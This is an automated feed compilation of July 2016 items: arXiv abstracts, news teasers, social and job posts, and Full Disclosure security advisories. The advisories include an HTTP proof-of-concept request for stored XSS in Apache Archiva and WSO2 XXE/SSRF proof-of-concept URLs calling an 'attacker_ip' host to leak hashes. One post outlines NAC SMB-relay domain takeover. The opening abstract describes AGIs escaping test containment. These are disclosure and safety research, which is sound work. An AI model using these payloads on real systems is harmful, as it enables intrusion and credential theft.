There is considerable uncertainty about what properties, capabilities and motivations future AGIs will have. In some plausible scenarios, AGIs may pose security risks arising from accidents and defects. In order to mitigate these risks, prudent early AGI research teams will perform significant testing on their creations before use. Unfortunately, if an AGI has human-level or greater intelligence, testing itself may not be safe; some natural AGI goal systems create emergent incentives for AGIs to tamper with their test environments, make copies of themselves on the internet, or convince developers and operators to do dangerous things. In this paper, we survey the AGI containment problem - the question of how to build a container in which tests can be conducted safely and reliably, even on AGIs with unknown motivations and capabilities that could be dangerous. We identify requirements for AGI containers, available mechanisms, and weaknesses that need to be addressed.



from cs.AI updates on arXiv.org http://ift.tt/227J5bZ
via IFTTT

Demand Prediction and Placement Optimization for Electric Vehicle Charging Stations. (arXiv:1604.05472v2 [cs.AI] UPDATED)

Effective placement of charging stations plays a key role in Electric Vehicle (EV) adoption. In the placement problem, given a set of candidate sites, an optimal subset needs to be selected with respect to the concerns of both (a) the charging station service provider, such as the demand at the candidate sites and the budget for deployment, and (b) the EV user, such as charging station reachability and short waiting times at the station. This work addresses these concerns, making the following three novel contributions: (i) a supervised multi-view learning framework using Canonical Correlation Analysis (CCA) for demand prediction at candidate sites, using multiple datasets such as points of interest information, traffic density, and the historical usage at existing charging stations; (ii) a mixed-packing-and- covering optimization framework that models competing concerns of the service provider and EV users; (iii) an iterative heuristic to solve these problems by alternately invoking knapsack and set cover algorithms. The performance of the demand prediction model and the placement optimization heuristic are evaluated using real world data.



from cs.AI updates on arXiv.org http://ift.tt/1pfq2zz
via IFTTT

Anonymous-12414261

Name, Anonymous-12414261. User since, July 13, 2016. Number of add-ons developed, 0 add-ons. Average rating of developer's add-ons, Not yet ...

from Google Alert - anonymous http://ift.tt/29QQZbm
via IFTTT

I have a new follower on Twitter


Portray.al
Portray.al is a #creativeagency and #talentpool based in LA & Bangkok. We help #dynamicpeople build their #brand and change the world. #showupbeseen
International
https://t.co/VsZdfgj8pM
Following: 420 - Followers: 460

July 13, 2016 at 06:45PM via Twitter http://twitter.com/portrayalteam

Thumb-Suckers Anonymous

The patron saint of adult thumb-suckers is a 65-year-old Long Island salesman who looks strikingly like Hunter S. Thompson, down to the tinted aviator ...

from Google Alert - anonymous http://ift.tt/29z3N0f
via IFTTT

[FD] Cross-Site Scripting vulnerability in Google Forms WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in WP No External Links WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Top 10 - Popular posts plugin for WordPress

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Simple Membership WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Karolina Kocalevski
Marketer, Aussie New Yorker, devoted mom, wife, global friend. Wannabe designer. Aspiring runner. Serenity seeker. Coffee lover. Views my own.
New York
http://t.co/yOwCcztPEO
Following: 223 - Followers: 457

July 13, 2016 at 10:28AM via Twitter http://twitter.com/KKocalevski

NOW HIRING: Computer Vision and OpenCV Correspondence Coordinator

you_are_hired_corkboard

The PyImageSearch blog has grown a lot since I published that first post back in January 2014. It’s been an incredible journey and I have you, the reader, to thank for all the support over the past 2.5 years.

However, due to the whirlwind growth of PyImageSearch, I now receive 100+ emails per day — and it’s gotten to the point where I can’t keep up with them all.

Believe it or not, I have been the only employee of PyImageSearch for the past 2.5 years — and I’ve personally answered each and every email I’ve received during that time.

Interacting with you is honestly one of the highlights of my day.

For example:

Have you emailed me a question, no matter how basic or advanced, regarding computer vision?

Yep, I answered it.

Did you email me, asking about Practical Python and OpenCV? Or inquiring regarding the PyImageSearch Gurus course?

I was the one who responded.

Did you need technical support of some kind?

I was there offer assistance.

But due to the volume, it has gotten to the point where I need a correspondence coordinator to come in and help me:

  1. Prioritize and triage emails and inquiries.
  2. Answer general questions and comments regarding content on the PyImageSearch blog.
  3. Point readers in the right direction if they have a question you can answer.
  4. Categorize more advanced questions/business inquiries that you cannot answer for me to personally respond to.

In short, the primary role of this job consists of two elements:

  1. Help me answer questions regarding computer vision and OpenCV.
  2. Categorize incoming emails and questions, so I have a clear, prioritized view when I login to respond.

This will help me serve the PyImageSearch community even more, since I’ll be able to focus on the tasks that specifically need my experience and expertise.

JOB DETAILS

  • Part time: 2-4 hours per day, every day Monday-Friday
  • Paid on an hourly rate (this is flexible — I will consider a fixed weekly or monthly payment as well)
  • Work remotely
  • Compensation based on experience ($25-$55 per hour, depending on experience)

Of course, if you’re an exceptional fit for this position, the roles of and responsibilities for this job can grow as well. Think of this as your entry point to working with me.

SKILLS AND REQUIREMENTS

To be successful in this role, you need to have the following skills and qualities:

  • You hold yourself to high standards.
  • You have STRONG written and verbal communication skills in the ENGLISH language.
  • You have previous experience in computer vision (the more experience, the better).
  • You have knowledge of the OpenCV library and have used it in previous projects (the more experience, the better).
  • You have the ability to write clear, coherent responses to questions involving computer vision, image processing, and OpenCV.
  • You enjoy answering questions, providing feedback, offering suggestions, and really helping people.
  • You are professional in your responses.
  • You can maintain a positive attitude when responding to questions.
  • You have basic Python programming skills.
  • You have basic Unix experience.

BONUS POINTS IF:

  • You are a long-time reader of the PyImageSearch blog.
  • You have read through the Practical Python and OpenCV book.
  • You have graduated from the PyImageSearch Gurus course.
  • You have earned a college-level degree with coursework/final project/thesis involving computer vision, or similar real world experience.
  • You have an awesome StackOverflow reputation.
  • You have experience with the Raspberry Pi.

AM I RIGHT FOR THIS JOB?

You are the right person for this job if:

  1. You enjoy computer vision and like helping others.
  2. You want to work with a successful entrepreneur in a small company — and help shape the future of PyImageSearch.

Taking this job is more than answering questions regarding computer vision, image processing, and OpenCV. It’s a chance to work with me and learn from me. You don’t have to be an entrepreneur yourself to apply for this job, but I would expect that you’re interested (at some level) in startups and small business.

WHEN DOES THIS JOB START?

As soon as possible — I am targeting mid-August as a start date, but I will be flexible if you have circumstances that prevent you from starting then (you have to be the right fit for the job, of course).

HOW DO I APPLY?

To apply for this job, please use this link:

http://ift.tt/29XmbFo

I’ll be accepting applications until July 31st at 11:59PM EST, so make sure you get your applications in by then!

WHAT HAPPENS AFTER I APPLY?

After you apply, I’ll be personally reviewing your application.

From there, I’ll follow up with you over email, ask any additional questions, and if necessary, set up a formal interview, etc., normally within 3-4 days.

I’ll also be asking you to answer a few sample emails to get a feel for your writing style and computer vision/OpenCV knowledge. Don’t worry, there aren’t any “right” or “wrong” responses to these examples — I just need to get a feeling of how you write and interact with others. If you applied, be sure to keep an eye on your inbox for this next series of emails!

The post NOW HIRING: Computer Vision and OpenCV Correspondence Coordinator appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/29NPokG
via IFTTT

Search not working on /search/* page for anonymous users

Split-off from #2723847: Repeat field_prefix and field_suffix rendered, form submit action broken if used #input_group_button property.. After used ...

from Google Alert - anonymous http://ift.tt/2a9bMCR
via IFTTT

Several Critical Remotely Exploitable Flaws Found in Drupal Modules, patch ASAP!

The extraordinary 'Panama Papers leak' from Law firm Mossack Fonseca that exposed the tax-avoiding efforts by the world's richest and most influential members was initially believed to be the result of an unpatched vulnerability in the popular open source Drupal content management system. Now, we are quite sure that the Panama Papers, which implicated 72 current and former heads of state, was


from The Hacker News http://ift.tt/29vtAv4
via IFTTT

ISS Daily Summary Report – 07/12/16

Marrow Blood, Breath, and Ambient Air Sample Collection: Upon waking this morning, the crew took the Launch plus 4 day (L+4) blood, breath, and ambient air samples for the Canadian Space Agency (CSA) Marrow experiment which investigates the effect of microgravity on human bone marrow. It is believed that microgravity, like long-duration bed rest on Earth, has a negative effect on bone marrow and the blood cells that are produced in the marrow. The extent of this effect and its recovery are of interest to space research and healthcare providers on Earth. 3D Printing in Zero-G Experiment: After two consecutive weeks of successful 3D printer operations, today the ground team remotely operated the 3D printer to produce the final 3D printed test coupons in the Microgravity Science Glovebox (MSG).  The crew removed and stowed all but the last batch, which will remain on the print tray, which will be returned on SpaceX-9 along with the rest of the coupons. Today’s operations bring the total number of coupons printed to 34, which includes a variety of 3D printed test coupons, including calibration, tensile, compression, and layer specimen coupons. The 3D Printing In Zero-G experiment demonstrates that a 3D printer works normally in space. A 3D printer extrudes streams of heated plastic, metal or other material, building layer on top of layer to create 3 dimensional objects. Testing a 3D printer using relatively low-temperature plastic feedstock on the ISS is the first step toward establishing an on-demand machine shop in space, a critical enabling component for deep-space crewed missions and in-space manufacturing. Mouse Epigenetics Setup Operations: In preparation for the Mouse Epigenetics experiment arriving on SpaceX (SpX)-9, the crew completed setup operations by reconfiguring the Cell Biology Experiment Facility (CBEF) video cable from the Image Processing Unit (IPU) to Video Compression and Recording Unit 2 (VRU2) and refilling the washer fluid of the Mouse Habitat Cage Unit before removal from the CBEF. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the DNA of their offspring. Results from the investigation identify genetic alterations that occur after exposure to the microgravity environment of space.  NanoRacks Plate Reader Locker Preparation and Hardware Relocate: In preparation for the arrival of the NanoRacks payload investigations on SpX-9, the crew relocated NanoRacks hardware from the NanoRacks Plate Reader installation location before removing and stowing the locker.  NanoRacks Plate Reader is a laboratory instrument designed to detect biological, chemical or physical events of samples in micro-titer plates. Micro-plate readers are widely used in research, drug discovery, bioassay validation, quality control and manufacturing processes in the pharmaceutical and biotechnological industry and academic organizations. Space Headaches: The crew completed the European Space Agency (ESA) Space Headaches questionnaire to provide information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space. Headaches during space flight can negatively affect mental and physical capacities of crew members which can influence performance during a space mission.  Waste and Hygiene Compartment (WHC) Pump Separator: Yesterday, the WHC pump separator light annunciated suggesting a malfunction of the pump. The crew brought the WHC to internal EDV and ran the separator for 3 minutes to drain any excess liquid.  Following that drain, the light cleared and WHC was nominal for 3 uses while still on internal EDV. The crew reconfigured back to Urine Processing Assembly (UPA) and performed troubleshooting where the ground teams ruled out blockage in the UPA and cleared WHC for nominal operation. This morning the crew reported a high pitch noise coming from the WHC.  Ground teams believe this could be an indication that fluid has traveled into the pump separator bearings.  Crew performed an inspection of the interior of the rack and of the pump separator, which did not reveal any leaked fluid.  The WHC continues to be go for nominal use.  The installed separator pump has been in operation since January.  Two spares are available on-orbit.  Teams continue to monitor performance. Dragon On-Board Training (OBT): In preparation for SpX-9 arrival scheduled for July 20, the USOS crew participated in a conference with ground teams prior to performing proficiency training on the Dragon mission profile, rendezvous crew procedures and crew interfaces for monitoring and commanding. Mobile Servicing System (MSS) Operations: Yesterday, Robotics Ground Controllers powered up the MSS and maneuvered the Space Station Remote Manipulator System (SSRMS) into position for the start of the ISS Crew SpX-9 Offset Grapples Practice on July 15.  Next they translated the Mobile Transporter (MT) from Worksite 6 (WS6) to WS4. At the completion of preparing the MT for the translation, Controllers noticed that Umbilical Mating Assembly 1 (UMA1) showed a status of both mated and demated on Channel A so they performed the MT translation on Channel B.  They are investigating the issue.  Today’s Planned Activities All activities were completed unless otherwise noted. MARROW – Ambient Air Samples Morning Inspection. SM ПСС (Caution & Warning Panel) Test / Manual Controls Morning Inspection, RSS1,2 Reboot / r/g 1460 CSA Blood Collection CBEF Cable Reconfig Auxiliary Computer System [ВКС] Laptops Antivirus Scan Check and Status Report / r/g 8247 CSA Refrigerated Centrifuge Configuration SEISMOPROGNOZ. Download Data from Control and Data Acquisition Module (МКСД) HDD (Start) r/g 2224 CORRECTSIYA. Logging Liquid and Food (Medication) Intake / r/g 2769 CSA Refrigerated Centrifuge Spin Conclude CSA Sample Insertion into MELFI Video Footage of Greetings / r/g 2768 Sample Retrieval from Glacier 2 freezer CSA – Blood Sample Collection Closeout Ops GLACIER1 Desiccant Replacement Filling (separation) of EDV (KOV) for Elektron or EDV-SV ARED Handover Video Review PILOT-T. Preparation for the experiment r/g 2766 ARED Handover Orientation Removal of GoPro cameras in Soyuz 731. Transfer of Video to Hard Drive. Flash card closeout ops. Start charging batteries SAMS Equipment Removal Crew time for ISS adaptation and orientation PILOT-T. Experiment Ops r/g 2766 СОЖ Maintenance Mouse Habitat Unit (MHU) Cage removal from CBEF NanoRack Plate Reader […]

from ISS On-Orbit Status Report http://ift.tt/29NJAYD
via IFTTT

State-Sponsored SCADA Malware targeting European Energy Companies

Security researchers have discovered a new campaign targeting energy companies in Western Europe with a sophisticated malware that almost goes to great lengths in order to remain undetected while targeting energy companies. Researchers from SentinelOne Labs discovered the malware, which has already infected at least one European energy company, is so sneaky and advanced that it is likely


from The Hacker News http://ift.tt/29NoklF
via IFTTT

Critical Print Spooler Bug allows Attackers to Hack any version of Microsoft Windows

Microsoft's July Patch Tuesday offers 11 security bulletins with six rated critical resolving almost 50 security holes in its software. The company has patched a security flaw in the Windows Print Spooler service that affects all supported versions of Windows ever released, which if exploited could allow an attacker to take over a device via a simple mechanism. The "critical" flaw (


from The Hacker News http://ift.tt/29QRqil
via IFTTT

prod unexpected token: name (BroccoliPlugin BundlePlugin failed)

... Error: SyntaxError: Unexpected token: name (Ng2WebSocket) (line: 18884, col: 6, pos: 762066) Error at new JS_Parse_Error (eval at <anonymous> ...

from Google Alert - anonymous http://ift.tt/29weEck
via IFTTT

Self-tallying quantum anonymous voting

Anonymous voting is a voting method of hiding the link between a vote and a voter, the context of which ranges from governmental elections to ...

from Google Alert - anonymous http://ift.tt/29uQRNm
via IFTTT

Chasing Juno


Wait for me! In 2011, NASA's robotic mission Juno launched for Jupiter from Cape Canaveral, Florida, USA. Last week, Juno reached Jupiter and fired internal rockets to become only the second spacecraft to orbit our Solar System's largest planet. Juno, tasked with studying the jovian giant over the next two years, is in a highly elliptical orbit that will next bringing it near Jupiter's cloud tops in late August. Of course, the three-year-old pictured was not able to catch up to the launching rocket. Today, however, five years later, he is eight-years-old and still chasing rockets -- in that now he wants to be an astronaut. via NASA http://ift.tt/29TCcfx

Tuesday, July 12, 2016

Orioles: Zach Britton gets the save for AL in 4-2 All-Star Game victory; allowed one hit before inducing game-ending DP (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Digital Trends
Tech for the way we live. | Instagram: @DigitalTrends | Snapchat: digitaltrends
Portland, OR, and New York, NY
https://t.co/wxxwes6lsF
Following: 670135 - Followers: 744224

July 12, 2016 at 11:13PM via Twitter http://twitter.com/DigitalTrends

A Framework for Estimating Long Term Driver Behavior. (arXiv:1607.03189v1 [cs.RO])

The authors present a cyber-physical systems study on the estimation of driver behavior in autonomous vehicles and vehicle safety systems. Extending upon previous work, the approach described is suitable for the long term estimation and tracking of autonomous vehicle behavior. The proposed system makes use of a previously defined Hybrid State System and Hidden Markov Model (HSS+HMM) system which has provided good results for driver behavior estimation. The HSS+HMM system utilizes the hybrid characteristics of decision-behavior coupling of many systems such as the driver and the vehicle, uses Kalman Filter estimates of observable parameters to track the instantaneous continuous state, and estimates the most likely driver state. The HSS+HMM system is encompassed in a HSS structure and inter-system connectivity is determined by using Signal Processing and Pattern Recognition techniques. The proposed method is suitable for scenarios that involve unknown decisions of other individuals, such as lane changes or intersection precedence/access. The long term driver behavior estimation system involves an extended HSS+HMM structure that is capable of including external information in the estimation process. Through the grafting and pruning of metastates, the HSS+HMM system can be dynamically updated to best represent driver choices given external information. Three application examples are also provided to elucidate the theoretical system.



from cs.AI updates on arXiv.org http://ift.tt/29CX3Se
via IFTTT

Automatic Bridge Bidding Using Deep Reinforcement Learning. (arXiv:1607.03290v1 [cs.AI])

Bridge is among the zero-sum games for which artificial intelligence has not yet outperformed expert human players. The main difficulty lies in the bidding phase of bridge, which requires cooperative decision making under partial information. Existing artificial intelligence systems for bridge bidding rely on and are thus restricted by human-designed bidding systems or features. In this work, we propose a pioneering bridge bidding system without the aid of human domain knowledge. The system is based on a novel deep reinforcement learning model, which extracts sophisticated features and learns to bid automatically based on raw card data. The model includes an upper-confidence-bound algorithm and additional techniques to achieve a balance between exploration and exploitation. Our experiments validate the promising performance of our proposed model. In particular, the model advances from having no knowledge about bidding to achieving superior performance when compared with a champion-winning computer bridge program that implements a human-designed bidding system.



from cs.AI updates on arXiv.org http://ift.tt/2a7pVQS
via IFTTT

Populations can be essential in tracking dynamic optima. (arXiv:1607.03317v1 [cs.NE])

Real-world optimisation problems are often dynamic. Previously good solutions must be updated or replaced due to changes in objectives and constraints. It is often claimed that evolutionary algorithms are particularly suitable for dynamic optimisation because a large population can contain different solutions that may be useful in the future. However, rigorous theoretical demonstrations for how populations in dynamic optimisation can be essential are sparse and restricted to special cases.

This paper provides theoretical explanations of how populations can be essential in evolutionary dynamic optimisation in a general and natural setting. We describe a natural class of dynamic optimisation problems where a sufficiently large population is necessary to keep track of moving optima reliably. We establish a relationship between the population-size and the probability that the algorithm loses track of the optimum.



from cs.AI updates on arXiv.org http://ift.tt/29CWPKK
via IFTTT

Extended Graded Modalities in Strategy Logic. (arXiv:1607.03354v1 [cs.GT])

Strategy Logic (SL) is a logical formalism for strategic reasoning in multi-agent systems. Its main feature is that it has variables for strategies that are associated to specific agents with a binding operator. We introduce Graded Strategy Logic (GradedSL), an extension of SL by graded quantifiers over tuples of strategy variables, i.e., "there exist at least g different tuples (x_1,...,x_n) of strategies" where g is a cardinal from the set N union {aleph_0, aleph_1, 2^aleph_0}. We prove that the model-checking problem of GradedSL is decidable. We then turn to the complexity of fragments of GradedSL. When the g's are restricted to finite cardinals, written GradedNSL, the complexity of model-checking is no harder than for SL, i.e., it is non-elementary in the quantifier rank. We illustrate our formalism by showing how to count the number of different strategy profiles that are Nash equilibria (NE), or subgame-perfect equilibria (SPE). By analyzing the structure of the specific formulas involved, we conclude that the important problems of checking for the existence of a unique NE or SPE can both be solved in 2ExpTime, which is not harder than merely checking for the existence of such equilibria.



from cs.AI updates on arXiv.org http://ift.tt/2a7pUMO
via IFTTT

A New Learning Method for Inference Accuracy, Core Occupation, and Performance Co-optimization on TrueNorth Chip. (arXiv:1604.00697v2 [cs.NE] UPDATED)

IBM TrueNorth chip uses digital spikes to perform neuromorphic computing and achieves ultrahigh execution parallelism and power efficiency. However, in TrueNorth chip, low quantization resolution of the synaptic weights and spikes significantly limits the inference (e.g., classification) accuracy of the deployed neural network model. Existing workaround, i.e., averaging the results over multiple copies instantiated in spatial and temporal domains, rapidly exhausts the hardware resources and slows down the computation. In this work, we propose a novel learning method on TrueNorth platform that constrains the random variance of each computation copy and reduces the number of needed copies. Compared to the existing learning method, our method can achieve up to 68.8% reduction of the required neuro-synaptic cores or 6.5X speedup, with even slightly improved inference accuracy.



from cs.AI updates on arXiv.org http://ift.tt/227J7AB
via IFTTT

Iterative Judgment Aggregation. (arXiv:1604.06356v3 [cs.AI] UPDATED)

Judgment aggregation problems form a class of collective decision-making problems represented in an abstract way, subsuming some well known problems such as voting. A collective decision can be reached in many ways, but a direct one-step aggregation of individual decisions is arguably most studied. Another way to reach collective decisions is by iterative consensus building -- allowing each decision-maker to change their individual decision in response to the choices of the other agents until a consensus is reached. Iterative consensus building has so far only been studied for voting problems. Here we propose an iterative judgment aggregation algorithm, based on movements in an undirected graph, and we study for which instances it terminates with a consensus. We also compare the computational complexity of our iterative procedure with that of related judgment aggregation operators.



from cs.AI updates on arXiv.org http://ift.tt/1YJEOuu
via IFTTT

[FD] [RCESEC-2016-004][CVE-2016-5005] Apache Archiva 1.3.9 admin/addProxyConnector_commit.action connector.sourceRepoId Persistent Cross-Site Scripting

RCE Security Advisory http://ift.tt/1FlL0Pz 1. ADVISORY INFORMATION ======================= Product: Apache Archiva Vendor URL: http://ift.tt/1qUxjGr Type: Cross-Site Scripting [CWE-79] Date found: 2016-05-31 Date published: 2016-07-11 CVSSv3 Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N) CVE: CVE-2016-5005 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Apache Archiva v1.3.9 older versions may be affected too. 4. INTRODUCTION =============== Apache Archiva™ is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as Maven, Continuum, and ANT. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The script "/archiva/admin/addProxyConnector_commit.action" is vulnerable to an authenticated persistent Cross-Site Scripting vulnerability when user- supplied input to the HTTP POST parameter "connector.sourceRepoId" is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to place arbitrary script code permanently on the "Administration - Proxy Connectors" page as well as on the "Admin: Delete Proxy Connector" page. The following Proof-of-Concept triggers this vulnerability and adds a new proxy connector called "XSS": POST /archiva/admin/addProxyConnector_commit.action HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cookie: JSESSIONID=1vabu6a1f9wye; rbkSignon=7574033ea6d44b4a9722cfa53a7b4001; _ga=GA1.2.1956020753.1461333249; __utma=86544839.1956020753.1461333249.1461575160.1461575160.1; __utmz=86544839.1461575160.1.1.utmcsr=premium_main|utmccn=(not%20set)|utmcmd=(not%20set) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 567 pattern=&connector.order=0&connector.proxyId=%28direct+connection%29&connector.sourceRepoId=XSS&connector.targetRepoId=com.springsource.repository.bundles.external&connector.policies%5B%27propagate-errors-on-update%27%5D=always&connector.policies%5B%27cache-failures%27%5D=no&connector.policies%5B%27releases%27%5D=always&connector.policies%5B%27propagate-errors%27%5D=stop&connector.policies%5B%27checksum%27%5D=fail&connector.policies%5B%27snapshots%27%5D=always&propertyKey=&propertyValue=&blackListPattern=&whiteListPattern= The payload is then reflected on the "Administration - Proxy Connectors":

XSS

And on the "Admin: Delete Proxy Connector" page:

Are you sure you want to delete proxy connector [ XSS , maven2-repository.dev.java.net ] ?

6. RISK ======= To successfully exploit this vulnerability, a user with administrative rights must trick another authenticated user with administrative rights to visit one of the affected pages. Since this scenario is quite unlikely, the attack likelihood can be increased by combining this vulnerability with the Cross-Site Request Forgery vulnerability as described in RCESEC-2016-003 (CVE-2016-4469). The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of the Apache Archiva administrative backend interface, which offers a wide range of possible attacks such as stealing cookies or attacking the browser and its components of a user visiting the page. 7. SOLUTION =========== Upgrade/Migrate to Apache Archiva 2.2.1 8. REPORT TIMELINE ================== 2016-05-31: Discovery of the vulnerability 2016-05-31: Notified vendor via public security mail address 2016-06-06: No response, sent out another notification 2016-06-10: Vendor states that this version is out of support 2016-07-07: Vendor assigns CVE-2016-5005 2016-07-11: Advisory released 9. REFERENCES ============= http://ift.tt/29Pxjky

Source: Gmail -> IFTTT-> Blogger

[FD] [RCESEC-2016-003][CVE-2016-4469] Apache Archiva 1.3.9 Multiple Cross-Site Request Forgeries

RCE Security Advisory http://ift.tt/1FlL0Pz 1. ADVISORY INFORMATION ======================= Product: Apache Archiva Vendor URL: http://ift.tt/1qUxjGr Type: Cross-Site Request Forgery [CWE-253] Date found: 2016-05-31 Date published: 2016-07-11 CVSSv3 Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) CVE: CVE-2016-4469 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Apache Archiva v1.3.9 older versions may be affected too. 4. INTRODUCTION =============== Apache Archiva™ is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as Maven, Continuum, and ANT. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The application basically offers a Cross-Site Request Forgery protection using the a Struts-based token called "token". While many administrative functionalities like adding new users are protected on this way, the following HTTP POST-based functions are missing this token and are therefore vulnerable to CSRF: Adding new repository proxy connectors: /archiva/admin/addProxyConnector_commit.action Adding new repositories: /archiva/admin/addRepository_commit.action Editing existing repositories: /archiva/admin/editRepository_commit.action Adding legacy artifact paths: /archiva/admin/addLegacyArtifactPath_commit.action Changing the organizational appearance: /archiva/admin/saveAppearance.action Uploading new artifacts: /archiva/upload_submit.action The following Proof-of-Concept triggers this vulnerability and adds a new proxy connector called "CSRF":
6. RISK ======= To successfully exploit this vulnerability a user with administrative rights must be tricked into visiting an arbitrary website while having an authenticated session in the application. The vulnerability allows remote attackers to perform sensitive administrative actions like adding new repository proxy connectors, adding new repositories, editing existing repositories, adding legacy artifact paths, changing the organizational appearance or uploading new artifacts in the authentication context of the targeted user. 7. SOLUTION =========== Upgrade/Migrate to Apache Archiva 2.2.1 8. REPORT TIMELINE ================== 2016-05-31: Discovery of the vulnerability 2016-05-31: Notified vendor via public security mail address 2016-06-06: No response, sent out another notification 2016-06-10: Vendor states that this version is out of support 2016-06-21: Vendor assigns CVE-2016-4469 2016-07-11: Advisory released 9. REFERENCES ============= http://ift.tt/29VB7ni

Source: Gmail -> IFTTT-> Blogger

[FD] WSO2 SOA Enablement Server - Reflected Cross Site Scripting vulnerability

Title: WSO2 SOA Enablement Server - Reflected Cross Site Scripting Authors: Pawel Gocyla Date: 08. June 2016 Affected Software: ================== WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 Probably other versions are also vulnerable. Vulnerability: ************** Reflected Cross Site Scripting: ============================== Proof of Concept: https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl= Fix: ==== Patches were already released by the vendor. Contact: ======== pawellgocyla[at]gmail[dot]com

Source: Gmail -> IFTTT-> Blogger

[FD] WSO2 SOA Enablement Server - XML External Entity Injection

Title: WSO2 SOA Enablement Server - XML External Entity Injection Authors: Pawel Gocyla, Jakub Palaczynski Date: 08. June 2016 Affected Software: ================== WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 Probably other versions are also vulnerable. Vulnerability: ************** XML External Entity Injection: ============================== It must be noted that this vulnerability is exploitable without authentication. Proof of Concept: 1. An attacker sets up web server that serves two files (wsdl.txt and file.dtd): wsdl.txt: file.dtd: "> 2. An attacker sets up FTP server that logs every command executed on the server. 3. An attacker sends request that triggers vulnerability: https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=http://attacker_ip/wsdl.txt FIX: ==== Patches were already released by the vendor. Contact: ======== pawellgocyla[at]gmail[dot]com jakub.palaczynski[at]gmail[dot]com

Source: Gmail -> IFTTT-> Blogger

[FD] WSO2 SOA Enablement Server - Server Side Request Forgery

Title: WSO2 SOA Enablement Server - Server Side Request Forgery Authors: Pawel Gocyla Date: 10. June 2016 Affected Software: ================== WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 Probably other versions are also vulnerable. Vulnerability: ************** Server Side Request Forgery (SSRF): =================================== Using this vulnerability it is possible for example to expose service user credentials. It must be noted that this vulnerability is exploitable without authentication. Proof of Concept: http://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=file:////attacker_ip/get/hashes Fix: ==== Patches were already released by the vendor. Contact: ======== pawellgocyla[at]gmail[dot]com

Source: Gmail -> IFTTT-> Blogger

[FD] RCE by abusing NAC to gain Domain Persistence.

link: http://ift.tt/29vJD8m Hi there! I want to share how to compromise whole enterprise network in less than ONE minute :) Let's begin... As security consultants, we often advice to our clients to implement Network Access Control systems to prevent some nasty people to do their nasty things... This article is not about how to bypass Network Access Control systems, but if you're interested, read this: http://ift.tt/29utyDJ In two words, NAT can bypass almost everything and stay undetectable in enterprise network. So when somebody (huge organisations) implementing NAC in their network environment, they are implementing a huge backdoor - called NAC. Let me explain some NAC logic: 1. Check for trusted MAC address. 2. Check installed components/registry keys in workstation via WMI interface. 3. Check another stuff in workstation's NAC agent. Wait for a second. How NAC will connect to a workstation to check (2) Registry Keys via WMI? Right. SMB Authentication with highly privileged account, in Domain Admin group. Let's assume these: 1. We have a list of workstation's IPs gathered in passive reconnaissance (wireshark for example) 2. We know which IP belongs to Domain Contoller. Is something or someone can prevent me from performing SMB-Relay attack? NO! On servers this will not work, because of SMB Signing option is required. We take some workstation IP address, and while NAC is performing it's host validation, we will relay SMB authentication to legitimate workstation. It is trivial, but as result we are able to: 1. Reuse this authentication token and create a new Domain Admin account. 2. In case if this fails, we can create a local administrator account on ANY workstation. 3. Extract credentials of ALL local users including local admins. 4. Gain full control of the corporate network, including Domain Admin accounts. All this is done in less than ONE minute, before the port will be closed (by NAC). This issue was tested on several Network Access Control systems. Alexander Korznikov & Viktor Minin

Source: Gmail -> IFTTT-> Blogger

[FD] RootExplorer remote code execution

Disclosure timeline ===================== June 11th: discovered issues. June 12th: contacted App developer. June 12th: App developer replies that the new App is not ready yet, but will not download assets from HTTP. June 13th: asked how much time it'll take to fix, App developer didn't respond. July 2nd: App developer queried again, but failed to respond. July 8th: App developer got his 3rd notice, but failed to respond. July 9th: full disclosure. Technical details ================== RootExplorer is a rooted Android App aimed to ultimately control file operations on an Android device. Unfortunately, RootExplorer tries to download an external busybox from plain a HTTP website, which might cause rooted remote code execution. Blogpost ======= http://ift.tt/29utyUc

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2016-1014, CVE-2016-4247] Executable installers are vulnerable^WEVIL (case 35): Adobe's Flash Player (un)installers

Anonymous

Get the Anonymous Setlist of the concert at Hartwall Areena, Helsinki, Finland on May 10, 2007 and other Anonymous Setlists for free on setlist.fm!

from Google Alert - anonymous http://ift.tt/29OXCHM
via IFTTT

Warning: Millions of Xiaomi Phones Vulnerable to Remote Hacking

